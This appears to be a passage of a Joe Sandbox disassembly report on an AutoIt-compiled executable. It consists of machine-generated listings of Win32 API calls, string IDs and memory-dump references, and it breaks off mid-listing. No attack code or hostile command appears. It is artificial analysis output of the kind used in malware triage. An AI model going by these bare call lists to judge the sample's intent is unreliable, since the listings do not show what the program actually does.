                                                                                  • _wcscat.LIBCMT ref: 00AE4A11
                                                                                  • _wcsstr.LIBCMT ref: 00AE4A1C
                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AE4A38
                                                                                  • _wcscat.LIBCMT ref: 00AE4A81
                                                                                  • _wcscat.LIBCMT ref: 00AE4A88
                                                                                  • _wcsncpy.LIBCMT ref: 00AE4AB3
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82C8C
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00A82C94
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82CBF
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00A82CC7
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00A82CEC
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A82D09
                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A82D19
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A82D4C
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A82D60
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00A82D7E
                                                                                  • GetStockObject.GDI32(00000011), ref: 00A82D9A
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A82DA5
                                                                                    • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                                                    • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00A813C7), ref: 00A82DCC
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI
                                                                                  • API String ID: 1458621304-248962490
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • GetForegroundWindow.USER32(00B10980,?,?,?,?,?), ref: 00AA04E3
                                                                                  • IsWindow.USER32(?), ref: 00AD66BB
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$Foreground_memmove
                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                  • API String ID: 3828923867-1919597938
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B044AC
                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B0456C
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                  • API String ID: 3974292440-719923060
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00AF56E1
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00AF56EC
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00AF56F7
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00AF5702
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00AF570D
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00AF5718
                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00AF5723
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00AF572E
                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00AF5739
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00AF5744
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00AF574F
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00AF575A
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00AF5765
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00AF5770
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00AF577B
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00AF5786
                                                                                  • GetCursorInfo.USER32(?), ref: 00AF5796
                                                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00AF57C1
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                  • String ID:
                                                                                  • API String ID: 3215588206-0
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADB17B
                                                                                  • __swprintf.LIBCMT ref: 00ADB21C
                                                                                  • _wcscmp.LIBCMT ref: 00ADB22F
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ADB284
                                                                                  • _wcscmp.LIBCMT ref: 00ADB2C0
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00ADB2F7
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00ADB349
                                                                                  • GetWindowRect.USER32(?,?), ref: 00ADB37F
                                                                                  • GetParent.USER32(?), ref: 00ADB39D
                                                                                  • ScreenToClient.USER32(00000000), ref: 00ADB3A4
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADB41E
                                                                                  • _wcscmp.LIBCMT ref: 00ADB432
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00ADB458
                                                                                  • _wcscmp.LIBCMT ref: 00ADB46C
                                                                                    • Part of subcall function 00AA385C: _iswctype.LIBCMT ref: 00AA3864
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 3744389584-679674701
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00ADBAB1
                                                                                  • _wcscmp.LIBCMT ref: 00ADBAC2
                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ADBAEA
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00ADBB07
                                                                                  • _wcscmp.LIBCMT ref: 00ADBB25
                                                                                  • _wcsstr.LIBCMT ref: 00ADBB36
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBB6E
                                                                                  • _wcscmp.LIBCMT ref: 00ADBB7E
                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ADBBA5
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBBEE
                                                                                  • _wcscmp.LIBCMT ref: 00ADBBFE
                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00ADBC26
                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00ADBC8F
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                  • String ID: @$ThumbnailClass
                                                                                  • API String ID: 1788623398-1539354611
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                  • API String ID: 1038674560-1810252412
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 00ADCBAA
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ADCBBC
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00ADCBD3
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00ADCBE8
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00ADCBEE
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCBFE
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00ADCC04
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ADCC25
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ADCC3F
                                                                                  • GetWindowRect.USER32(?,?), ref: 00ADCC48
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00ADCCB3
                                                                                  • GetDesktopWindow.USER32 ref: 00ADCCB9
                                                                                  • GetWindowRect.USER32(00000000), ref: 00ADCCC0
                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ADCD0C
                                                                                  • GetClientRect.USER32(?,?), ref: 00ADCD19
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ADCD3E
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ADCD69
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0A87E
                                                                                  • DestroyWindow.USER32(?,?), ref: 00B0A8F8
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B0A972
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B0A994
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0A9A7
                                                                                  • DestroyWindow.USER32(00000000), ref: 00B0A9C9
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A80000,00000000), ref: 00B0AA00
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0AA19
                                                                                  • GetDesktopWindow.USER32 ref: 00B0AA32
                                                                                  • GetWindowRect.USER32(00000000), ref: 00B0AA39
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B0AA51
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B0AA69
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 1297703922-3619404913
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00B0CCCF
                                                                                    • Part of subcall function 00B0B1A9: ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                                                    • Part of subcall function 00B0B1A9: GetWindowRect.USER32(?,?), ref: 00B0B248
                                                                                    • Part of subcall function 00B0B1A9: PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CD38
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B0CD43
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B0CD66
                                                                                  • _wcscat.LIBCMT ref: 00B0CD96
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B0CDAD
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CDC6
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDDD
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDFF
                                                                                  • DragFinish.SHELL32(?), ref: 00B0CE06
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B0CEF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                  • API String ID: 169749273-3440237614
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00AE831A
                                                                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00AE8323
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00AE832F
                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AE841D
                                                                                  • __swprintf.LIBCMT ref: 00AE844D
                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00AE8479
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AE852A
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00AE85BE
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AE8618
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AE8627
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00AE8665
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                  • API String ID: 3730832054-3931177956
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B04A61
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B04AAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 3974292440-4258414348
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 00AEE31F
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AEE32F
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AEE33B
                                                                                  • __wsplitpath.LIBCMT ref: 00AEE399
                                                                                  • _wcscat.LIBCMT ref: 00AEE3B1
                                                                                  • _wcscat.LIBCMT ref: 00AEE3C3
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AEE3D8
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE3EC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE41E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE43F
                                                                                  • _wcscpy.LIBCMT ref: 00AEE44B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AEE48A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                  • String ID: *.*
                                                                                  • API String ID: 3566783562-438819550
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA2C2
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AEA2E3
                                                                                  • __swprintf.LIBCMT ref: 00AEA33C
                                                                                  • __swprintf.LIBCMT ref: 00AEA355
                                                                                  • _wprintf.LIBCMT ref: 00AEA3FC
                                                                                  • _wprintf.LIBCMT ref: 00AEA41A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 311963372-3080491070
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000), ref: 00AE009A
                                                                                  • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00A3
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00B47310,?,00000FFF,?,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000,00000001), ref: 00AE00C5
                                                                                  • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00C8
                                                                                  • __swprintf.LIBCMT ref: 00AE0118
                                                                                  • __swprintf.LIBCMT ref: 00AE0129
                                                                                  • _wprintf.LIBCMT ref: 00AE01D2
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE01E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                  • API String ID: 984253442-2268648507
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AEAA0E
                                                                                  • GetDriveTypeW.KERNEL32 ref: 00AEAA5B
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAAA3
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAADA
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAB08
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                  • API String ID: 2698844021-4113822522
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AEA852
                                                                                  • __swprintf.LIBCMT ref: 00AEA874
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AEA8B1
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AEA8D6
                                                                                  • _memset.LIBCMT ref: 00AEA8F5
                                                                                  • _wcsncpy.LIBCMT ref: 00AEA931
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AEA966
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AEA971
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00AEA97A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AEA984
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 2733774712-3457252023
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B0982C,?,?), ref: 00B0C0C8
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0DF
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0EA
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0F7
                                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C100
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C10F
                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C118
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C11F
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C130
                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B13C7C,?), ref: 00B0C149
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B0C159
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00B0C17D
                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B0C1A8
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B0C1D0
                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B0C1E6
                                                                                  Similarity
                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3840717409-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B0C8A4
                                                                                  • GetFocus.USER32 ref: 00B0C8B4
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00B0C8BF
                                                                                  • _memset.LIBCMT ref: 00B0C9EA
                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B0CA15
                                                                                  • GetMenuItemCount.USER32(?), ref: 00B0CA35
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B0CA48
                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B0CA7C
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B0CAC4
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B0CAFC
                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B0CB31
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1296962147-4108050209
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                    • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                    • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                    • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
